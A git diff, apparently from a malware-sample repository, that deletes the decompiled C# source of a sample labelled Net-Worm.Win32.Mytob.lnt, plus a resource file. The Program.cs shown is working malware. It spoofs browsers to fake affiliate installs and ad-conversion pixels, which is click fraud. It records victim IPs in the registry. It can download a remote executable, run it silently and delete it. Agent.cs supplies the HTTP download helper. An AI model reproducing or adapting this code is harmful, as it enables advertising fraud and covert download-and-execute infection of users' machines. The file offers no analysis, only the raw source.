Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.SnapToGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuMzMwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAADYEAAACAAABAAIAICAQAAAAAADoAgAAJgAAABAQEAAAAAAAKAEAAA4DAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd3d3d3d3d3d3d3d3d3dwBEREREREREREREREREREcAT/////////////////9HAE//////////////////RwBP/////////////////0cAT/////////////////9HAE//////////////////RwBP/////////////////0cAT/////////////////9HAE//////////////////RwBP/////////////////0cAT/////////////////9HAE//////////////////RwBP/////////////////0cAT/////////////////9HAE//////////////////RwBP/////////////////0cAT/////////////////9HAE//////////////////RwBP/////////////////0cASIiIiIiIiIiIiIiIiIhHAERERERERERERERERERERwBExMTExMTExMTE7Ozkl0cATMzMzMzMzMzMzMzMzMxAAAREREREREREREREREREAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////////////////////8AAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAA8AAAAf///////////////8oAAAAEAAAACAAAAABAAQAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAB3d3d3d3d3dERERERERER0////////hHT///////+EdP///////4R0////////hHT///////+EdP///////4R0////////hHT///////+EdIiIiIiIiIR0zMzMzMzMxHxERERERERMAAAAAAAAAAAAAAAAAAAAAA//8AAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAD//wAA//8AAAs=</value>
</data>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>CEZvcm1NYWlu</value>
</data>
</root>

269
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/AffiliateExecuterNoWin/Program.cs
View File

@ -1,269 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: AffiliateExecuterNoWin.Program
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using HTTPAgent;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace AffiliateExecuterNoWin
{
internal static class Program
{
private static string trackerUrlAndVersion;
[STAThread]
private static void Main(string[] args)
{
string str1 = "http://coolfbskins.info/getitnow";
string appName = "hazidtacp";
bool flag1 = false;
string URL = "http://whatismyipaddress.com/";
bool flag2 = false;
string str2 = "gamewrangler_v2.exe";
string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2;
Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2";
if (new DateTime(3000, 1, 1) < DateTime.Now)
return;
Agent agent = new Agent();
agent.EmulateBrowser();
if (flag1)
{
string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0];
string savedIps = Program.GetSavedIPs(appName);
if (savedIps.IndexOf(data) >= 0)
return;
Program.SetSavedIPs(appName, savedIps + data + ";");
}
if (!string.IsNullOrEmpty(str1))
agent.Referer = str1;
string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0];
agent.GetURL(data1);
string referer = agent.Referer;
agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F");
agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/");
agent.Referer = "";
agent.GetURL("http://www.facetheme.com/install_redirect.php");
string upper = Guid.NewGuid().ToString().ToUpper();
agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0");
agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/");
agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft");
agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560");
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID=");
Program.GetRecursivePixels(agent, url2);
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560");
if (!flag2)
return;
if (Directory.Exists("C:\\Users\\Public\\Documents\\"))
str2 = "C:\\Users\\Public\\Documents\\" + str2;
agent.getURL2File(url1, str2);
try
{
Process.Start(str2, "/s").WaitForExit();
System.IO.File.Delete(str2);
}
catch
{
}
}
private static void GetRecursivePixels(Agent agent, string html)
{
html = Regex.Replace(html, "<noscript>.*?</noscript>", "");
List<string> stringList = new List<string>();
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<SCRIPT language=\"javascript\" src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<IMG src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<img src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<iframe[^>]+?src=[\"']([^\"'\\\\]+)", "$1"));
string cid = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_id *= *([0-9]+)", "$1"));
if (cid != "")
{
string clang = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_language\\s*=\\s*\"([^\"]+)", "$1"));
string cformat = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_format\\s*=\\s*\"([^\"]+)", "$1"));
string ccolor = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_color\\s*=\\s*\"([^\"]+)", "$1"));
string clabel = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_label\\s*=\\s*\"([^\"]+)", "$1"));
stringList.Add(Program.createGoogleAdServicesURL(cid, clang, cformat, ccolor, clabel));
}
string offerID = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_offer_id\\s*=\\s*'([^']+)", "$1"));
string referece = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_reference\\s*=\\s*'([^']+)", "$1"));
if (offerID != "")
stringList.Add(Program.createFilitracURL(offerID, referece));
string referer = agent.Referer;
foreach (string str in stringList)
{
agent.Referer = referer;
string URL = str.Trim().Replace("&amp;", "&");
string url = agent.GetURL(URL);
Program.GetRecursivePixels(agent, url);
}
}
private static string randomString(int len)
{
string str1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Random random = new Random();
string str2 = "";
for (int index = 0; index < len; ++index)
str2 += (string) (object) str1[random.Next(str1.Length)];
return str2;
}
private static string GetSavedIPs(string appName)
{
string savedIps = ";";
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, false);
if (registryKey != null)
savedIps = registryKey.GetValue("ips").ToString();
}
catch
{
}
return savedIps;
}
private static void SetSavedIPs(string appName, string val)
{
try
{
(Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, true) ?? Registry.CurrentUser.CreateSubKey("SOFTWARE\\" + appName)).SetValue("ips", (object) val);
}
catch
{
}
}
public static void addTrackingCookies(CookieContainer cookies, string domain)
{
Random random = new Random();
Uri uri1 = new Uri("http://" + domain + "/");
Uri uri2 = new Uri("http://utm.trk." + domain + "/");
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str1 = Program.uHash(domain);
string str2 = str1 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1";
string str3 = str1 + "." + (object) totalSeconds + ".1.1.utmcsr=ZJxdm025|utmccn=(not+set)|utmcmd=(not+set)";
cookies.Add(uri1, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri1, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmz", str3, 1800));
cookies.Add(uri2, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri2, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmz", str3, 1800));
}
private static void BugFix_CookieDomain(CookieContainer cookieContainer, string domain)
{
Hashtable hashtable = (Hashtable) typeof (CookieContainer).InvokeMember("m_domainTable", BindingFlags.Instance | BindingFlags.NonPublic | BindingFlags.GetField, (Binder) null, (object) cookieContainer, new object[0]);
foreach (string key1 in new ArrayList(hashtable.Keys))
{
string str = key1;
if (str == domain)
{
string key2 = "." + str;
hashtable[(object) key2] = hashtable[(object) key1];
hashtable.Remove((object) key1);
}
}
}
public static string uHash(string d)
{
int num1 = 0;
for (int startIndex = d.Length - 1; startIndex >= 0; --startIndex)
{
int num2 = (int) char.Parse(d.Substring(startIndex, 1));
num1 = (num1 << 6 & 268435455) + num2 + (num2 << 14);
int num3;
if ((num3 = num1 & 266338304) != 0)
num1 ^= num3 >> 21;
}
return num1.ToString();
}
public static Cookie createCookie(string name, string value, int timeout) => new Cookie(name, value)
{
Expires = DateTime.Now.AddSeconds((double) timeout)
};
public static string GetTrackingUrlByTemplate(
Agent agent,
string url,
string trackingSearch,
string trackingReplace,
string domain)
{
string title = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmdt=([^&]*)", "$1"));
string hostname = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmhn=([^&]*)", "$1"));
string referer = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmr=([^&]*)", "$1"));
string tracking = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmp=([^&]*)", "$1"));
string utmac = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmac=([^&]*)", "$1"));
bool addutmcn = !(Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "(&utmcn=1)", "$1")) == "");
string URL = Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, utmac, domain);
if (!string.IsNullOrEmpty(trackingSearch) || !string.IsNullOrEmpty(trackingReplace))
URL = URL.Replace(trackingSearch, trackingReplace);
return agent.GetURL(URL);
}
public static string FirstOrEmpty(string[] arr) => arr.Length > 0 ? arr[0] : "";
public static string sGetTrackingUrl(
Agent agent,
string title,
string hostname,
string referer,
string tracking,
bool addutmcn)
{
return agent.GetURL(Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, "", ""));
}
public static string createTrackingUrl(
string title,
string hostname,
string referer,
string tracking,
bool addutmcn,
string utmac,
string domain)
{
Random random = new Random();
string str1 = Screen.PrimaryScreen.Bounds.Width.ToString() + "x" + (object) Screen.PrimaryScreen.Bounds.Height;
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str2 = Program.uHash(domain);
string str3 = "__utma%3D" + (str2 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1") + "%3B%2B__utmz%3D" + (str2 + "." + (object) totalSeconds + ".1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B");
return Program.trackerUrlAndVersion + "&utms=1&utmn=" + (object) random.Next(int.MaxValue) + "&utmhn=" + hostname + "&utmcs=utf-8&utmsr=" + str1 + "&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.2%20r159" + (title == "" ? (object) "" : (object) ("&utmdt=" + title)) + "&utmhid=" + (object) random.Next(int.MaxValue) + (referer == "" ? (object) "" : (object) ("&utmr=" + referer)) + (addutmcn ? (object) "&utmcn=1" : (object) "") + "&utmp=" + tracking + "&utmac=" + utmac + "&utmcc=" + str3 + "&utmu=q~";
}
private static string createFilitracURL(string offerID, string referece) => "http://www.filitrac.com/Lead.aspx?pid=" + offerID + "&ref=" + referece + "&iframe=1";
private static string createGoogleAdServicesURL(
string cid,
string clang,
string cformat,
string ccolor,
string clabel)
{
long num = 1000L * (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds + (long) new Random().Next(1000);
string[] strArray = clang.Split('_');
string str1 = strArray[0];
string str2 = strArray.Length <= 1 ? "" : strArray[1];
TimeSpan timeSpan = DateTime.Now - DateTime.UtcNow;
return "http://www.googleadservices.com/pagead/conversion/" + cid + "/?random=" + (object) num + "&cv=6&fst=" + (object) num + "&num=1&fmt=" + cformat + "&label=" + clabel + "&bg=" + ccolor + "&hl=" + str1 + "&gl=" + str2 + "&guid=ON&u_h=" + (object) Screen.PrimaryScreen.Bounds.Height + "&u_w=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_ah=" + (object) (Screen.PrimaryScreen.Bounds.Height - 30) + "&u_aw=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_cd=32&u_his=2&u_tz=" + (object) (int) (DateTime.Now - DateTime.UtcNow).TotalMinutes + "&u_nplug=0&u_nmime=0&url=http%3A//www.zwinky.com/dl/successPixels.jhtml";
}
}
}

14
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/AssemblyInfo.cs
View File

@ -1,14 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyTitle("WolfFt")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("WolfFt")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2010")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: Guid("D662A7A1-1AE7-4243-8734-5EF6601CBBF2")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]

217
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/HTTPAgent/Agent.cs
View File

@ -1,217 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: HTTPAgent.Agent
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using System;
using System.Collections.Specialized;
using System.IO;
using System.Net;
using System.Text;
using System.Web;
namespace HTTPAgent
{
public class Agent
{
public CookieContainer cookieJar = new CookieContainer();
private static string[] accepts = new string[4]
{
",text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
",text/html,text/plain,image/png,*/*",
",text/html;q=0.8,text/plain;q=0.6,image/png,image/jpg,image/gif,*/*;q=0.4",
",text/html,text/plain,image/*,*/*"
};
private static string[] userAgentsIE = new string[6]
{
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; FDM; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; MS-RTC LM 8; Zune 4.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
};
private static string[] userAgentsFF = new string[6]
{
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.0.4506.2152; .NET4.0C)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 BTRS86393 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
};
private string _lastResponseText;
private HttpWebResponse _lastResponse;
private string _accept;
private string _userAgent;
private string _referer;
private bool _handleReferer;
private string _acceptLanguage;
private string _acceptEncoding;
private string _acceptCharset;
public void EmulateBrowser()
{
Random random = new Random();
this.Accept = "text/xml,application/xml,application/xhtml+xml" + Agent.accepts[random.Next(Agent.accepts.Length)];
this.AcceptLanguage = "en";
this.UserAgent = random.Next(100) >= 60 ? Agent.userAgentsIE[random.Next(Agent.userAgentsIE.Length)] : Agent.userAgentsFF[random.Next(Agent.userAgentsFF.Length)];
this.HandleReferer = true;
}
public string postURL(string URL, NameValueCollection formValues)
{
HttpWebRequest request = (HttpWebRequest) WebRequest.Create(URL);
this.SetupRequest(request, "POST");
request.ContentType = "application/x-www-form-urlencoded";
StreamWriter streamWriter = new StreamWriter(request.GetRequestStream());
if (formValues != null)
{
foreach (string allKey in formValues.AllKeys)
{
streamWriter.Write("&" + allKey + "=");
streamWriter.Write(HttpUtility.UrlEncode(formValues[allKey]));
}
}
streamWriter.Close();
this.HandleResponse(request);
if (this.HandleReferer)
this.Referer = this._lastResponse.ResponseUri.ToString();
return this._lastResponseText;
}
public string GetURL(string URL)
{
HttpWebRequest request = (HttpWebRequest) WebRequest.Create(URL);
this.SetupRequest(request, "GET");
this.HandleResponse(request);
if (this.HandleReferer)
this.Referer = this._lastResponse.ResponseUri.ToString();
return this._lastResponseText;
}
public string GetURL(string URL, NameValueCollection formValues)
{
string str1 = "";
if (formValues != null)
{
foreach (string allKey in formValues.AllKeys)
str1 = str1 + "&" + allKey + "=" + HttpUtility.UrlEncode(formValues[allKey]);
}
string str2 = str1.Substring(1);
HttpWebRequest request = (HttpWebRequest) WebRequest.Create(URL + "?" + str2);
this.SetupRequest(request, "GET");
this.HandleResponse(request);
if (this.HandleReferer)
this.Referer = this._lastResponse.ResponseUri.ToString();
return this._lastResponseText;
}
public void getURL2File(string url, string dateiname)
{
HttpWebRequest request = (HttpWebRequest) WebRequest.Create(url);
this.SetupRequest(request, "GET");
this._lastResponse = (HttpWebResponse) request.GetResponse();
Stream responseStream = this._lastResponse.GetResponseStream();
if (dateiname.IndexOf("\\") != -1)
{
string path = dateiname.Substring(0, dateiname.LastIndexOf("\\"));
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
}
FileStream fileStream = new FileStream(dateiname, FileMode.Create);
byte[] buffer = new byte[1024];
while (true)
{
int count = responseStream.Read(buffer, 0, buffer.Length);
if (count != 0)
fileStream.Write(buffer, 0, count);
else
break;
}
responseStream.Close();
this._lastResponse.Close();
fileStream.Close();
}
private void HandleResponse(HttpWebRequest request)
{
this._lastResponse = (HttpWebResponse) request.GetResponse();
StreamReader streamReader = new StreamReader(this._lastResponse.GetResponseStream(), Encoding.UTF8);
this._lastResponseText = streamReader.ReadToEnd();
streamReader.Close();
this._lastResponse.Close();
}
private void SetupRequest(HttpWebRequest request, string method)
{
request.Method = method;
request.CookieContainer = this.cookieJar;
request.Accept = this._accept;
request.UserAgent = this._userAgent;
request.Referer = this._referer;
if (this._acceptCharset != null)
request.Headers.Add("Accept-Charset", this._acceptCharset);
if (this._acceptEncoding != null)
request.Headers.Add("Accept-Encoding", this._acceptEncoding);
if (this._acceptLanguage == null)
return;
request.Headers.Add("Accept-Language", this._acceptLanguage);
}
public string LastResponseText => this._lastResponseText;
public HttpWebResponse LastResponse => this._lastResponse;
public string Accept
{
get => this._accept;
set => this._accept = value;
}
public string UserAgent
{
get => this._userAgent;
set => this._userAgent = value;
}
public string Referer
{
get => this._referer;
set => this._referer = value;
}
public bool HandleReferer
{
get => this._handleReferer;
set => this._handleReferer = value;
}
public string AcceptLanguage
{
get => this._acceptLanguage;
set => this._acceptLanguage = value;
}
public string AcceptEncoding
{
get => this._acceptEncoding;
set => this._acceptEncoding = value;
}
public string AcceptCharset
{
get => this._acceptCharset;
set => this._acceptCharset = value;
}
public static string UrlEncode(string str) => HttpUtility.UrlEncode(str);
public static string UrlDecode(string str) => HttpUtility.UrlDecode(str);
public static string HtmlEncode(string str) => HttpUtility.HtmlEncode(str);
public static string HtmlDecode(string str) => HttpUtility.HtmlDecode(str);
}
}

69
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/HTTPAgent/DataExtractor.cs
View File

@ -1,69 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: HTTPAgent.DataExtractor
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using System.Collections;
using System.Collections.Specialized;
using System.Text.RegularExpressions;
namespace HTTPAgent
{
public class DataExtractor
{
private DataExtractor()
{
}
public static string[] ExtractDataArray(
string input,
string pattern,
string replacement,
RegexOptions options)
{
ArrayList arrayList = new ArrayList();
foreach (Match match in Regex.Matches(input, pattern, options))
{
if (replacement == string.Empty)
arrayList.Add((object) match.Value);
else
arrayList.Add((object) match.Result(replacement));
}
return (string[]) arrayList.ToArray(typeof (string));
}
public static string[] ExtractDataArray(string input, string pattern, string replacement) => DataExtractor.ExtractDataArray(input, pattern, replacement, RegexOptions.None);
public static NameValueCollection ExtractHiddenFields(string input, int x)
{
NameValueCollection hiddenFields = new NameValueCollection();
MatchCollection matchCollection1 = Regex.Matches(input, "<form.+?</form>", RegexOptions.IgnoreCase | RegexOptions.Singleline);
if (matchCollection1.Count > 0)
{
int i = x;
if (i < 0)
i = 0;
if (i > matchCollection1.Count - 1)
i = matchCollection1.Count - 1;
MatchCollection matchCollection2 = Regex.Matches(matchCollection1[i].Value, "<input([^>]+?type=\"hidden\"[^>]+?)/?>", RegexOptions.IgnoreCase | RegexOptions.Singleline);
Regex regex = new Regex("(\\S+?)=\"(.*?)\"", RegexOptions.Compiled | RegexOptions.Singleline);
foreach (Match match1 in matchCollection2)
{
MatchCollection matchCollection3 = regex.Matches(match1.Groups[1].Value);
string name = "";
string str = "";
foreach (Match match2 in matchCollection3)
{
if (match2.Groups[1].Value.ToLower() == "name")
name = match2.Groups[2].Value;
if (match2.Groups[1].Value.ToLower() == "value")
str = match2.Groups[2].Value;
}
hiddenFields[name] = str;
}
}
return hiddenFields;
}
}
}

49
MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/Net-Worm.Win32.Mytob.lnt.csproj
View File

